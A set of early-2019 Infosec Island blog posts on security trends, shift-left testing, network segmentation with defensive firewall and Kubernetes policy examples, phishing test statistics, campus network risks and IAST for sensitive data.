Attackers are not just getting smarter, they are also using the most advanced technologies available, the same ones being used by security professionals – namely, artificial intelligence (AI) and machine learning (ML).

Meanwhile, the widespread adoption of cloud, mobile and IoT technologies has created a sprawling IT attack surface that is getting harder to protect from cyber threats, since fixing every existing vulnerability in these infrastructures is simply infeasible.

Here are four ways attackers will exploit technology in new and creative ways over the next 12 months.

AI Bias will Pose New Security Risks

The bias issue is in its infancy now, but will grow rapidly this year and beyond. We can expect attackers to exploit the vulnerabilities associated with it.

Since algorithms are being applied everywhere, bias will follow them. For example, for AI to function properly in cybersecurity, a continuous feed of quality data is required. Garbage in will produce garbage out, such as too many false positives and/or too many false negatives. Furthermore, AI gives probable, rather than definitive answers.

We expect AI bias to increase this year, since many users are not updating their base data and results are not being verified by security analysts. Under these circumstances, AI can have the reverse effect for cybersecurity: instead of making organizations more secure, AI will generate unreliable insights that, if followed, will increase, not decrease, risk.

Automation/Orchestration Tools will be Hijacked

Automation and orchestration tools allow developers and security professionals to achieve new levels of speed and efficiency using unattended processes performed in software. These frameworks, if compromised by attackers, can be co-opted for malicious purposes.

For example, Kubernetes, the world’s most popular cloud container orchestration system, experienced its first major security vulnerability recently.

The bug, CVE-2018-1002105, aka the Kubernetes privilege escalation flaw, allows specially crafted requests to establish a connection through the Kubernetes API server to backend systems, then send arbitrary requests over the same connection directly to these machines.

Exploiting just one Kubernetes vulnerability would enable an attacker to take down containers across the globe. While the Kubernetes bug has been fixed, the writing on the wall is clear: more automation and orchestration tools will be targeted in the next 12 months.

Robotic Process Automation Will be Targeted

Robotic process automation (RPA) is being used to control a wide range of operational technologies in manufacturing and many other critical infrastructure sectors.

From a security standpoint, RPA creates a dangerous new attack surface that has multiple layers, including a robust web layer, an API layer, a data exchange layer, and so on. Plus, RPA systems lack robust defence mechanisms.

While we did not see many RPA vulnerabilities disclosed in 2018, this is likely to change this year as RPA solutions go increasingly mainstream. If exploited, these vulnerabilities could compromise an entire industrial plant or even several facilities at once.

API Attacks Will Increase

Many companies fail to protect their APIs with the same level of security they devote to networks and business-critical applications. As a result, APIs have far-reaching implications for security teams. Case in point: Google, which announced it would be shutting down Google+ because of an API compromise.

The Google experience is just the tip of the iceberg, as companies rarely disclose API attacks. More high-profile API attacks are inevitable as they provide hackers with the keys to the kingdom, giving them numerous avenues for access into corporate data, processes, and operations.

Furthermore, APIs generally contain clear, well-documented details on the inner workings of applications – information that provides hackers with valuable clues on attack vectors they can exploit.

While advances in technology provide many benefits when it comes to digital transformation, they also open new threat vectors and the potential for attacks that can spread quickly over connected ecosystems. Maintaining visibility into traditional and emerging (Orchestration, RPA, API, etc.) IT infrastructures and vulnerabilities associated with them will play a central role in reducing security incidents this year. Identifying and fixing those that pose the highest risk will be even more important.

About the author: Dr. Srinivas Mukkamala, co-founder and CEO of RiskSense, is a recognized expert on artificial intelligence (AI) and neural networks. He holds a patent on Intelligent Agents for Distributed Intrusion Detection System and Method of Practicing.

Strategies for Winning the Application Security Vulnerability Arms Race
https://www.infosecisland.com/blogview/25164-Strategies-for-Winning-the-Application-Security-Vulnerability-Arms-Race.html
Thu, 17 Jan 2019 09:10:49 -0600

As cyber criminals continuously launch more sophisticated attacks, security teams increasingly struggle to keep up with the constant stream of security threats they must investigate and prioritize. When observing companies that have a large web presence (e.g., retail/e-commerce companies), consider the broad threat landscape at play. Web application attacks were responsible for 38 percent of the data breaches examined in the 2018 Verizon Data Breach Investigations Report (DBIR).

To win the vulnerability arms race, security teams need to fight fire with fire by partnering with their own application development teams and enabling them to identify and fix security vulnerabilities in their code earlier in the development process. In doing so, organizations can resolve critical security vulnerabilities before applications move into production, greatly minimizing their risk for costly data breaches.

Catching and resolving vulnerabilities earlier in the software development life cycle (SDLC) makes life a lot easier for security teams further downstream. Shifting left enables security teams to avoid tedious and unnecessary review, greatly reducing their workload and allowing them to focus on the most important security threats to their organizations.

Benefits of shifting left in software development

Various studies from the past decade support the assertion that fixing a software vulnerability earlier in the SDLC is faster, is much less expensive to the organization, and requires fewer resources than fixing a vulnerability in an application that has been released to production.

A 2008 white paper issued by IBM states that “the costs of discovering defects after release are significant: up to 30 times more than if you catch them in the design and architecture phase.” While the white paper was issued a decade ago, this statement is just as significant today.

Obviously, the preferred approach is for developers to resolve security vulnerabilities while they’re coding rather than letting the same fatal issues propagate in countless other places in an application—and then having to return to the lengthy development phases of testing, quality assurance, and final production. Implementing a solution that aligns with development processes allows developers to nip vulnerabilities in the bud as they code, and creates a positive habit that is quick and painless.

Potential software security obstacles

If the solution is so obvious, then why aren’t more development organizations doing it?

  1. Development teams often lack security expertise, and security teams often lack development expertise. Consequently, these teams may feel as if they’re working at cross purposes.
  2. For many years, developers’ highest priority has been to get working software out the door as quickly as possible. If they perceive security testing tools as a roadblock in CI/CD workflows and stringent development schedules, they’ll refuse to adopt them, or they’ll find ways to work around them.

To address these issues, organizations should select the right security tools. These tools should provide developers with technical guidance and educational, contextual support to fix any security vulnerabilities flagged in their code immediately. These tools need to be fast and accurate, fit seamlessly into development workflows, and support developers in producing secure code while also enabling them to hit their release schedules.

What to look for in a static application security testing (SAST) tool

  1. Accuracy. Comprehensive code coverage; accurate identification and prioritization of critical security vulnerabilities to be fixed.
  2. Ease of use. An intuitive, consistent, modern interface involving zero configuration; insight into vulnerabilities with necessary contextual information (e.g., dataflow, CWE vulnerability description, and detailed remediation advice).
  3. Speed. Fast incremental analysis results that appear in seconds as developers write code.
  4. DevSecOps capabilities. Support for popular build servers and issue trackers; flexible APIs for integration into custom tools.
  5. Scalability. Enterprise capabilities to support thousands of projects, developers, and over 10 million issues.
  6. Management-level reporting and compliance to industry standards. Security standards coverage including OWASP Top 10, PCI DSS, and SANS/CWE Top 25; embedded technologies compliance standards coverage including MISRA, AUTOSAR, CERT C / C++, ISO 26262, and ISO/IEC TS 17961.
  7. eLearning integration. Contextual guidance and links to short courses specific to the issues identified in code; just-in-time learning when developers need it.

Security and development teams need to collaborate closely to ensure that enterprise web and mobile applications are free of vulnerabilities that can lead to costly data breaches. Choosing the right development security tool is the first step toward achieving this critical goal.

About the author: Anna Chiang is the Sr. Manager, SAST Product Marketing at Synopsys. She has also held lead roles in application security and platform product management at WhiteHat Security, Perforce Software, and BlackBerry.

2019 Predictions: What Will Be This Year’s Big Trends in Tech?
https://www.infosecisland.com/blogview/25162-2019-Predictions-What-Will-Be-This-Years-Big-Trends-in-Tech.html
Wed, 16 Jan 2019 09:32:00 -0600

2018 was a year that saw major developments in machine learning, artificial intelligence and the Internet of Things, along with some of the largest scale data breaches to date. What will 2019 bring, and how can businesses prepare themselves for the technological developments to come over the next twelve months?

Data security 

More than any other year, 2018 has cemented the importance of keeping data secure online, with many high-profile breaches such as British Airways, Marriott Hotels and Ticketmaster hitting the headlines. 

But despite these breaches, the worrying trend of insecurely storing massive amounts of personal data online is showing no signs of slowing down. As such, cyber criminals will continue to look for ways to exploit data in any way they can: committing fraud, theft or using it to craft highly targeted attacks. With people beginning to grow conscious of the digital footprint they are leaving behind, it’s likely that we’ll start to see data security being taken far more seriously by businesses over the next year.

This will have a significant impact on larger organisations, which will need to look beyond securing their perimeters and ensure that their networks are robust, especially as networks become a more popular attack vector amongst cyber criminals due to the increasing number of network vulnerabilities.

Organisations will need to bear in mind that implementing firewalls and securing endpoints are no longer enough to stay secure against evolving threats, and that they will instead need to focus on ensuring they have a robust and thorough security strategy that can handle the complexities of the modern cyber security landscape.

Ethics & legislation

Data, and the legislation that governs it, will continue to be an ongoing source of discussion – and one that could ultimately affect how we interact with technology in the years to come.

With the landmark General Data Protection Regulation (GDPR) coming into force last year, we should soon see the impact that this will have on organisations, who will be challenged on their data processing and protection procedures. The next twelve months will likely see the first organisations face the penalties that go along with falling foul of GDPR, and organisations would be wise to investigate their own data handling now before it becomes too late.

With many businesses continuing to embrace cutting-edge technologies such as artificial intelligence and machine learning, we will also start to explore the implications of these technologies for data protection, with updates to existing legislation likely to be required to keep pace with their rapid development.

IoT and AI 

Despite the many advancements made in the world of artificial intelligence over the last year, the technology is still very much in its infancy. With many still sceptical of the scope and usefulness of AI, 2019 will be an important year for exploring its possibilities, along with investigating how it could impact our daily and working lives, particularly when it comes to data handling, cloud technologies and smart home devices.

To sustain the growth of AI, the technology will need to work efficiently alongside IoT devices in order to rapidly process growing swathes of data. The interaction between the two will serve as an interesting case study for their utility over the coming year, and should see major developments and acceptance in the wider working world.

Data will continue to be a crucial consideration for businesses over the coming year, intertwining with many technological advancements, and proving to be a source of ethical and legislative interest. Although it’s impossible to predict exactly what might happen over the next twelve months, we can be sure that data will be the focus of many discussions when it comes to security and emerging technologies in 2019.

About the author: Matt Johnson is Chief Technology Officer at Intercity Technology. With over 25 years’ business and technical experience in providing IT solutions, Matt’s expertise covers the design, implementation, support and management of complex communications networks.

Copyright 2010 Respective Author at Infosec Island
Taking Advantage of Network Segmentation in 2019 https://www.infosecisland.com/blogview/25163-Taking-Advantage-of-Network-Segmentation-in-2019.html https://www.infosecisland.com/blogview/25163-Taking-Advantage-of-Network-Segmentation-in-2019.html Wed, 16 Jan 2019 06:52:56 -0600 Overview

Security is and will always be top of mind within organizations as they plan out the year ahead. One method of defense that always deserves attention is network segmentation.

In the event of a cyberattack, segmented networks will confine the attack to a specific zone – and by doing so, contain its impact by preventing attackers from exploiting their initial access to move deeper into the network. By segmenting your network and applying strong access controls for each zone, you isolate any attack and prevent damage before it can start.

But today, in 2019, enterprise networks are no longer just networks. They are a patchwork of traditional networks, software-defined networks, cloud services and microservices. Segmenting this hybrid conglomerate requires an updated approach.

In this article, I will review exactly how your organization can get started with network segmentation – including some potential issues to plan for and successfully avoid.

Getting Started

Organizations seeking a starting point typically find that designating rudimentary network zones is the most successful approach, even for today’s more complex hybrid networks. Initial zones typically include Internal, External, Internet, and DMZ. Further refinements to segments and access policies can then be made to these initial zones, ultimately resulting in an acceptable policy.
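To make the starter zones concrete, here is a minimal sketch in Python of how a team might record its zones and classify an address against them. The zone-to-CIDR assignments are purely illustrative:

```python
# Illustrative sketch: record the four starter zones and classify addresses
# against them. Zone-to-CIDR assignments here are hypothetical examples.
import ipaddress

ZONES = {
    "Internal": ipaddress.ip_network("10.0.0.0/8"),
    "DMZ": ipaddress.ip_network("172.16.0.0/16"),
    "External": ipaddress.ip_network("203.0.113.0/24"),  # e.g., a partner-facing range
}

def classify(ip: str) -> str:
    """Return the zone an address falls in; anything unmatched is Internet."""
    addr = ipaddress.ip_address(ip)
    for zone, network in ZONES.items():
        if addr in network:
            return zone
    return "Internet"

print(classify("10.1.2.3"))   # Internal
print(classify("8.8.8.8"))    # Internet
```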

Solidify Your Security Policy

Organizations need a standard policy for allowable ports and protocols between zones. This needs to be fully documented, in a format that can be quickly accessed and reviewed, not something unofficial that lives only in the head of your IT security manager. Once the security policy is written down and centralized, each modification to access policies can be made consistently and confidently.
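One way to get the policy out of people’s heads and into a reviewable artifact is to express it as data. Below is a minimal sketch under assumed, illustrative zone names and ports; it is not a recommended baseline:

```python
# A minimal sketch of security policy as data: which protocol/port pairs each
# source zone may use to reach each destination zone. Entries are illustrative;
# anything unlisted is denied by default.
ALLOWED = {
    ("Internal", "DMZ"): {("tcp", 443), ("tcp", 22)},
    ("DMZ", "Internet"): {("tcp", 443), ("udp", 53)},
    ("Internet", "DMZ"): {("tcp", 443)},
}

def is_allowed(src: str, dst: str, proto: str, port: int) -> bool:
    """Check a proposed flow against the documented policy."""
    return (proto, port) in ALLOWED.get((src, dst), set())

assert is_allowed("DMZ", "Internet", "udp", 53)
assert not is_allowed("Internal", "Internet", "tcp", 23)  # denied by default
```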

As your segmentation initiative continues, take the opportunity to consider segmenting the network even further using user identity and application controls.

Restrict Egress

Most likely, your network is already infected; even if it isn’t, it’s good practice to assume so. Completely preventing malware in your network is practically impossible, but there is an easier mitigation: if you limit egress (outbound) connectivity to only what is needed, you can prevent malware from calling back home and from uploading stolen data.
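As a rough illustration of the idea, the sketch below generates default-deny egress rules from a small allowlist. The destinations and ports are placeholders, and iptables is just one of many possible enforcement points:

```python
# Sketch: emit default-deny egress rules from a small allowlist. Destinations
# and ports are placeholders; adapt to your own environment before use.
EGRESS_ALLOWLIST = [
    ("udp", 53, "10.0.0.53/32"),   # internal DNS resolver only
    ("tcp", 443, "0.0.0.0/0"),     # HTTPS out; tighten to known hosts if you can
]

rules = [
    "iptables -P OUTPUT DROP",                                          # default deny
    "iptables -A OUTPUT -o lo -j ACCEPT",                               # loopback
    "iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT",
]
for proto, port, dest in EGRESS_ALLOWLIST:
    rules.append(
        f"iptables -A OUTPUT -p {proto} --dport {port} -d {dest} -j ACCEPT"
    )

print("\n".join(rules))  # review before applying on a host
```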

Traditional Networks, the Cloud, and Beyond

As your network expands into the cloud you may need to partner with application teams. If your organization is moving to the cloud in a “lift and shift” approach, your cloud networks are probably considered an extension of your on-premise network and the traditional segmentation architecture will be applied. Organizations that are already doing “cloud native” operations (characterized by DevOps and CI/CD processes) take a different approach. They architect their cloud around applications rather than networks. In this case, the cloud will be owned by the relevant application team and, in the event of a security incident, you will need to work closely with them to contain the breach.

This exercise often results in two or more teams uniting around a shared goal, while also providing an opportunity to improve the network’s connectivity and security. When you identify the parts of the network you are responsible for segmenting, you will also want to include any anticipated networks that may be adopted or merged with your existing network. By understanding that these changes will introduce new security concerns and obstacles, you can better plan for the overall impact on your network segmentation strategy.

Make It Manageable

Parallel to ongoing changes in networking platforms are changes to network policy. This year, your organization may undertake a cloud-first initiative, launch new businesses, or open new locations across the globe – and you need to be ready for it.

Regardless of what changes in your network, there needs to be consistency in how those changes are managed and tracked. Identifying the tools already configured on your network, or currently used to manage it, makes the segmentation process achievable from the start. If you identify multiple existing solutions, consider whether you can integrate them to create a central console for designing, implementing and managing ongoing segmentation.

Implement In Phases

Once you’ve reached this point in the segmentation process, you should know which resources are available and who can contribute to segmentation design and implementation. Armed with this knowledge, you should now set priorities.

First and foremost, assess the network at a high level and consider what zones you will want to designate (however rudimentary they seem). Even segmenting the network in half will give you greater control over connectivity, increase visibility into access, and surface risks in existing access rules that you may previously have missed.

Starting with the initial four zones from above, you can identify further connectivity restrictions and prioritize which zones need to be segmented further (e.g., zones holding sensitive data or critical cyber assets).

If you are required to comply with specific industry regulations, start by designating a sensitive data zone (for example, a zone for PCI DSS systems and data). You can begin with compliance in mind and then take a step back to approach the broader network. This approach will help you identify connectivity improvements, reduce access permissions, and complicate potential attacks on sensitive data.

Microsegmentation

When you start applying security, you apply it at the macro level: zones, subnets, VLANs, etc. As you make progress in your security journey, you can consider the micro as well. Modern architectures such as SDN, cloud platforms and Kubernetes microservices provide flexible ways to build individual access controls for applications with a security-first mentality, an approach commonly referred to as microsegmentation. Restricting connectivity per application gives you greater control, with more specific whitelists and easier identification of abnormal behavior. To do this effectively you will need to involve application owners.
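In a Kubernetes environment, for instance, per-application whitelisting is typically expressed as a NetworkPolicy. The sketch below builds one for a hypothetical “payments” service that should only accept traffic from its API gateway; the labels, namespace, and port are assumptions for illustration:

```python
# Sketch: build a Kubernetes NetworkPolicy so that only the API gateway pods
# may reach a hypothetical "payments" service. Labels, namespace, and port
# are illustrative assumptions.
import yaml  # PyYAML

policy = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "NetworkPolicy",
    "metadata": {"name": "payments-allow-gateway", "namespace": "payments"},
    "spec": {
        "podSelector": {"matchLabels": {"app": "payments"}},
        "policyTypes": ["Ingress"],
        "ingress": [{
            "from": [{"podSelector": {"matchLabels": {"app": "api-gateway"}}}],
            "ports": [{"protocol": "TCP", "port": 8443}],
        }],
    },
}

print(yaml.safe_dump(policy, sort_keys=False))  # e.g., pipe to kubectl apply -f -
```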

Don’t Do Too Much, Too Soon

Remember to segment in a gradual, deliberate progression. It is very important to avoid over-segmenting: highly granular controls applied across the whole network at once can make it unmanageable, simply because of the sheer volume of segments and the complexity that comes with them. While segmentation improves overall compliance and security, organizations should segment incrementally in order to maintain manageability and avoid overcomplicating the network.

Taking on too much, too soon, or moving to micro- or nano-segmentation from the beginning, can create an “analysis paralysis” situation, where the team is quickly overwhelmed and the promise of network segmentation is lost.

An example of doing too much would be assigning a security zone to every application in a 500-application environment. If every zone is individually customized, the sheer volume of network rules can overwhelm the team, ultimately leaving the organization less secure.

Take Action

As anyone who’s worked a day in security knows, automated solutions can send an overwhelming number of alerts. Network Security Policy Management (NSPM) solutions can alleviate this alert fatigue: violations of security policy can be reviewed to determine whether they are allowable exceptions or require changes in order to comply. Beyond policy compliance, NSPM solutions can assess whether access violations followed approved exception procedures.
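Conceptually, that review loop can be as simple as the sketch below: observed flows, however your tooling exports them, are checked against the documented policy, and anything outside it is queued for a human decision. The field names and policy table are illustrative:

```python
# Sketch of the review loop: compare observed flows (e.g., exported from
# firewall logs) against the documented policy and queue anything outside it
# for human review. Field names and the policy table are illustrative.
ALLOWED = {
    ("Internal", "DMZ"): {("tcp", 443), ("tcp", 22)},
}

observed_flows = [
    {"src": "Internal", "dst": "DMZ", "proto": "tcp", "port": 443},      # compliant
    {"src": "Internal", "dst": "Internet", "proto": "tcp", "port": 25},  # violation
]

for flow in observed_flows:
    key = (flow["src"], flow["dst"])
    if (flow["proto"], flow["port"]) not in ALLOWED.get(key, set()):
        # Allowable exception, or does a rule (or the policy itself) need to change?
        print("review:", flow)
```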

Security professionals are often targeted by attackers. NSPM solutions can also be used to determine if network violations are the result of attackers using compromised credentials to grant themselves access to sensitive data.

Never Rest

The proper approach to network segmentation is to never say “completed.” Every network is subject to change – and so are the access controls governing connectivity. A continuous stepwise approach is best. Using NSPM, with each step, you have the opportunity to review, revise, and continue the momentum towards optimal segmentation. 

About the author: Reuven Harrison is CTO and Co-Founder of Tufin. He led all development efforts during the company’s initial fast-paced growth period, and is focused on Tufin’s product leadership. Reuven is responsible for the company’s future vision, product innovation and market strategy. Under Reuven’s leadership, Tufin’s products have received numerous technology awards and wide industry recognition.

Copyright 2010 Respective Author at Infosec Island
Why Zero Tolerance Is the Future for Phishing https://www.infosecisland.com/blogview/25158-Why-Zero-Tolerance-Is-the-Future-for-Phishing.html https://www.infosecisland.com/blogview/25158-Why-Zero-Tolerance-Is-the-Future-for-Phishing.html Wed, 09 Jan 2019 11:20:16 -0600 Our Testing Data Shows You’re Letting Me Hack You Every Time

Phishing just doesn’t get the love it deserves in the security community. It doesn’t get the headlines, security staff time, or dedicated attention that other, more flashy threat vectors get. Certainly, high-impact malware variants that sweep the globe and get their own cool logos and catchy names command respect. But at the end of the day, phishing attacks are really the ones that bring most organizations to their knees, and they sit at the very start of some of the most devastating cyberattacks.

From my experience as a penetration tester and social engineer, it seems that most customers view phishing campaigns as a requirement to deal with once a year, with some high-performing companies tossing in additional computer-based training. In most instances, this type of testing is just one mandatory component of an annual compliance audit like FedRAMP, which means, in effect, that the enterprise hasn’t tested its phishing defenses since the last time an audit was performed. Yet the numbers tell an alarming story: phishing has been shown to be the first step in over 90% of recorded breaches. It is a formidable threat to every organization, and one that is typically not addressed adequately in cybersecurity strategies.

As security professionals, we are commonly asked, “What is an acceptable failure rate for phishing?” (FedRAMP and other certifications address acceptable failure rates as well.) For years, the prevailing sentiment, and some professional guidance, has been that anything under 10% is trending in the right direction. In my view that guidance is misguided, yet many industry professionals and consultancies continue to hand out the same improper (or perhaps we should say “very outdated”) advice, however well intentioned.

We have gathered three years of phishing test data from multiple campaigns launched at organizations ranging from top Fortune 500 companies all the way down to sole proprietorships. From the data, one metric stands above all others: a 62.5% compromise rate. We have tested over 100 companies, from those with, in their own estimation, “stellar phishing programs,” to those that run a single campaign once a year, to those that do relatively nothing from year to year. While the quality of phishing testing programs spans a broad range, the fact of the matter is that if a person clicks on a phishing email link (and 26.2% do, on average, in our data), there is on average a 62.5% chance that the person will either download a payload that gives the malicious actor control of the host or hand over working credentials to their account. While there are security measures that can help to a degree, the metrics are clear: even if the threat actor doesn’t compromise your host, more than half the time an active username and password ends up in the hands of a malicious actor.

These results should be a significant wake-up call for every organization. Even using the “old” acceptable rate of a 10% click-through, that leaves roughly a 6% compromise rate. Consider what that looks like for a large enterprise with, say, 50,000 employees. A 26.2% click rate equals 13,100 clicks, and if this company were to fall at the “average” compromise rate, that would be 8,187 compromises! Even the industry-standard 10% click rate would yield 3,125 compromises. 
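The arithmetic is easy to reproduce. In the sketch below, the rates are the averages from our testing data and the 50,000-employee company is hypothetical:

```python
# Reproducing the arithmetic above; the rates are the averages from our test
# data, and the 50,000-employee company is hypothetical.
employees = 50_000
click_rate = 0.262        # average click rate observed in our campaigns
compromise_rate = 0.625   # average compromise rate per click

clicks = employees * click_rate
print(int(clicks))                           # 13100 clicks
print(int(clicks * compromise_rate))         # 8187 compromises

legacy_clicks = employees * 0.10             # the "old" 10% target
print(int(legacy_clicks * compromise_rate))  # 3125 compromises even at 10%
```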

I believe that companies should be striving for zero clicks. While this may well be unattainable, we humans tend to grow complacent once we come close to our goals. A goal of 10% will likely mean 12%. A goal of 2% will likely achieve a result of 5%, which, at a 62.5% compromise rate, will still open the enterprise network to an unacceptable level of risk. Given not only the important role phishing plays as an entryway to significant breaches but also the likelihood of compromise per click, the industry should be shouting “Zero Tolerance” for all to hear. The days of acceptable risk should be over.

We are unlikely to eliminate the human element and the risks it brings; there will always be mistakes as long as humans are involved. But by standing up progressively better phishing testing programs that train employees, reward them for improvement, incentivize them for doing the right thing, and demonstrate what “good” looks like, enterprises can both set and meet far more aggressive targets and better protect the organization.

While phishing isn’t the most interesting, headline-worthy topic in cyber news today, it should be a top cybersecurity concern in nearly every company. The cultural norm needs to shift to zero tolerance, and until it does, as a social engineer and fake criminal by day, I would like to thank you. Every single phishing campaign I run is going to provide me access to your system. You are making access to your company so very easy.

About the author: Gary De Mercurio is senior consultant for the Labs group at Coalfire, a provider of cybersecurity advisory and assessment services.

Copyright 2010 Respective Author at Infosec Island
Universities Beware! The Biggest Security Threats Come from Within the Network https://www.infosecisland.com/blogview/25160-Universities-Beware-The-Biggest-Security-Threats-Come-from-Within-the-Network.html https://www.infosecisland.com/blogview/25160-Universities-Beware-The-Biggest-Security-Threats-Come-from-Within-the-Network.html Tue, 08 Jan 2019 07:09:15 -0600 Higher education networks have become incredibly complex. Long gone are the days when students connected desktop computers to ethernet cables in their dorm rooms for internet access. Now students can access the school’s wireless network at any time, from anywhere, and often bring four or more devices with them on campus. Expecting to use their smartphones and gaming consoles for both school-related and personal matters, they rely on constant internet connectivity.

While the latest technology streamlines processes and makes the learning experience more efficient, higher education institutions’ networks have not kept up with technology and cyber security requirements. Network security threats have become more common, and according to a recent Infoblox study, 81 percent of IT professionals state that securing campus networks has become more challenging in the last two years.

Nevertheless, outside threats aren’t posing the biggest challenges; internal threats are.

More devices, more malware

IT administrators at universities have seen a surge in the number of devices connected to campus networks, making those networks more vulnerable to cyberattacks. Innovation in personal technology has played a large role in this. Beyond laptops, students bring a surplus of devices with them to school, such as smartphones and tablets. For example, an Infoblox study found that students now use tablets (61%), smartwatches (27%) and gaming consoles (25%) on campus.

This spike in devices directly impacts universities’ network activity. Where a few years ago IT administrators only had to worry about managing the school’s own devices, and potentially student and faculty laptops, that is no longer the case. The survey found that 60 percent of faculty, students and IT professionals use four or more devices on the campus network. This has made managing network activity incredibly complex and has increased the risk of cyberattack. Devices that are not native to the university network often do not maintain the same security standards that IT administrators are accustomed to.

Outdated security best practices

IT improvements have not been able to keep pace with the rate at which network activity is changing, making university networks an easy target for hackers and DDoS attacks. When devices using the university network are not properly secured, hackers can take advantage by breaking into a device, accessing the network, and wreaking havoc that can cost universities millions of dollars.

For example, Infoblox’s survey found that 60 percent of faculty haven’t made network security changes in two years. In addition to not updating security best practices, 57 percent rely on outdated security measures, such as only updating passwords, as a security precaution. Poor security practices also make it easier for hackers to compromise network infrastructure and access sensitive information.

A comprehensive cybersecurity strategy that involves network protection can help to combat these types of attacks, but only 52 percent of current network management solutions have DNS provisioning capabilities and can provide remote network access control. These capabilities play a critical role in identifying unusual activity on the network.

Lack of security awareness

Additionally, college students and faculty alike are not up to speed with the latest cybersecurity best practices and often make poor decisions that ultimately compromise network security. Thirty-nine percent of IT administrators say users aren’t educated enough on security risks, which makes managing the network more challenging. Students are also unaware of the risks IoT devices can pose to the overall health of the network and don’t have the security knowledge to understand the nuances. For example, 54 percent of IT administrators say at least 25 percent of students’ devices come onto campus already infected with malware.

College students are known to be reckless when it comes to partying, but it appears this mindset has also influenced their approach to cybersecurity. Infoblox’s survey also found that one in three college students have heard of other students implementing malware or launching malicious attacks on the school’s network. Students clearly have little regard for how their behavior can impact the network, making the job of the IT administrator extremely difficult.

Conclusion

For better network security at higher education institutions, change needs to begin from within. The IT department needs to implement a next level network security strategy that can thwart the ongoing threat of DDoS attacks. Students and faculty need to be educated on security best practices when using devices on the university network. In the age of the Internet of Things, the number of internet connected devices connecting to the campus network will only increase, and the network needs to be fortified to support this influx from both a performance and security standpoint.

About the author: Victor Danevich is the CTO of Infoblox where he helps customers achieve Next Level Networking via hyper-scalability, implementing automation, and improving network availability with solutions that are built with security from the core.

Copyright 2010 Respective Author at Infosec Island
IAST Technology Is Revolutionizing Sensitive Data Security https://www.infosecisland.com/blogview/25159-IAST-Technology-Is-Revolutionizing-Sensitive-Data-Security.html https://www.infosecisland.com/blogview/25159-IAST-Technology-Is-Revolutionizing-Sensitive-Data-Security.html Tue, 08 Jan 2019 06:55:00 -0600 Unauthorized access to sensitive data, also known as sensitive data leakage, is a pervasive problem affecting even those brands that are widely recognized as having some of the world’s most mature software security initiatives, including Instagram and Amazon. Sensitive data can include financial data such as bank account information, personally identifiable information (PII), and protected health information (i.e., information that can be linked to a specific individual relating to their health status, provision of care, or payment for care).

If an organization suffers a sensitive data breach, it is expected to notify authorities to disclose the breach; per GDPR, for example, the breached firm must disclose the breach within 72 hours of discovery. Such an incident can result in damage to the brand, marred customer trust leading to lost business, regulatory penalties, and the cost of funding the investigation into how the leak happened. Data breaches may even lead to lawsuits. As you can see, such an incident could be incredibly detrimental to the future of an organization. A variety of regulations around the globe emphasize the importance of protecting sensitive data. So why, then, are we still seeing this issue persist?

While we tend to only hear about the massive brands suffering a breach in the news, it’s not only these giant enterprises that are at risk. In fact, small- and medium-sized firms are equally, if not more, susceptible to sensitive data leakage concerns. While the payoff for an attacker isn’t as grand, smaller companies are less likely to have strategies in place to detect, prevent, and mitigate vulnerabilities leading to a breach.

To avoid a sensitive data leak leading to a breach, firms of all sizes need to pay attention to cyber security. Firms often build their own applications, and almost always rely on pre-existing applications to run their business.

If you build your own applications, test them extensively for security. With interactive application security testing (IAST), you can perform application security testing during functional testing. You don’t really need to hire experts to perform vulnerability assessment when you have IAST.

IAST solutions help organizations identify and manage security risks associated with vulnerabilities discovered in running web applications using dynamic testing (a.k.a., runtime testing) techniques. IAST works through software instrumentation, or the use of instruments to monitor an application as it runs and gather information about what it does and how it performs. 
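Commercial IAST agents hook the runtime itself, but a toy decorator conveys the flavor of observing an application from the inside as it executes. This is a simplified analogue for illustration, not how any particular product is implemented:

```python
# Toy analogue of runtime instrumentation: wrap a handler so every call is
# observed while the application runs. Real IAST agents hook the runtime
# itself; this decorator only illustrates the concept.
import functools

def instrumented(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        print(f"[agent] {func.__name__} called with args={args} kwargs={kwargs}")
        result = func(*args, **kwargs)
        print(f"[agent] {func.__name__} returned {result!r}")
        return result
    return wrapper

@instrumented
def get_profile(user_id: int) -> dict:
    # A stand-in for an application endpoint exercised during functional testing.
    return {"user_id": user_id, "email": "user@example.com"}

get_profile(42)
```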

Considering that 84 percent of all cyber-attacks are happening in the application layer, take an inventory of the data relating to your organization’s applications. Develop policies around it. For instance, consider how long to keep the data, the type of data you’re storing, and who requires access to that data. Don’t store data you don’t need as a business. Keep information only as long as necessary. Enforce data retention policies. Put authorization and access controls in place around that data. Protect passwords properly. And, train employees on how to handle this data.

While it’s simple to recommend that firms should be taking an inventory of the data being processed by organizational applications, that is, in reality, a massive undertaking. Where do you even start?

IAST not only identifies vulnerabilities but verifies them as well. With traditional application security testing tools, a high false positive rate is a common problem. IAST technology’s verification engine minimizes false positives and helps firms understand which vulnerabilities to resolve first.

Sensitive data in web applications can be monitored through IAST, providing a solution to the data leakage problem. IAST monitors web application behavior, including code, memory, and data flow, to determine where sensitive data is going: whether it’s being written to a file in an unprotected manner, exposed in the URL, or handled without proper encryption. If sensitive data isn’t being handled properly, the IAST tool will flag the instance. There is no manual searching for sensitive data; IAST tooling detects it on behalf of the application owner, who can also alter the rules to fine-tune their goals.
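In spirit, a sensitive-data rule is a check like the following sketch, applied to values the agent observes at runtime; the patterns here are deliberately simplistic placeholders:

```python
# Illustrative stand-in for a sensitive-data rule: flag values that look
# sensitive when they appear somewhere they shouldn't, such as a URL.
# The patterns are deliberately simplistic placeholders.
import re

SENSITIVE_PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def flag_sensitive_in_url(url: str) -> list:
    """Return the names of sensitive patterns found in a URL."""
    findings = [name for name, pattern in SENSITIVE_PATTERNS.items()
                if pattern.search(url)]
    if findings:
        print(f"FLAG {findings}: sensitive data exposed in URL {url}")
    return findings

flag_sensitive_in_url("https://example.com/profile?ssn=123-45-6789")
```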

It’s also important to note that applications are built from many components: third party components, proprietary code, and open source components. Think of it like Legos. Any one (or more) of the pieces could be vulnerable. This is why, when testing your applications, it’s critical to fully test all three of these areas.

